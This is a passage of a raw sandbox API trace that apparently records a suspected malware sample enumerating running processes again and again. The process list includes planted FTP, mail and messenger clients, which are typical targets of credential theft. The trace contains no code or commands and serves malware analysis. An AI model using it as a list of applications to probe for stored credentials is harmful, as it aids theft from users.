lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0244.838] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0244.840] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.841] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.842] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.844] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0244.845] CloseHandle (hObject=0x1b08) returned 1 [0244.845] Sleep (dwMilliseconds=0x64) [0244.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0244.992] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.994] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.998] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.000] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.002] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.004] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.005] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.006] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.008] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.010] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.015] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.016] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.018] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.019] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.021] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.023] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.024] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.025] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.072] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.074] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.075] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0245.076] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0245.078] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.079] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.080] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0245.082] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0245.083] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0245.085] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0245.087] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.088] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.092] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.093] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.095] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.096] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0245.098] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0245.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0245.100] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0245.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0245.103] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0245.107] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0245.109] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0245.110] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0245.111] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0245.113] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0245.114] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0245.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0245.117] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0245.118] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0245.119] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0245.141] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0245.143] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0245.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0245.145] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0245.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0245.148] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0245.149] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0245.151] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0245.155] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0245.156] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0245.158] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0245.160] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0245.161] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0245.163] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0245.165] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0245.166] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0245.171] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0245.172] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0245.174] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0245.175] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0245.177] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0245.179] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0245.180] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0245.232] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0245.234] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0245.236] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0245.237] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0245.239] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0245.240] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 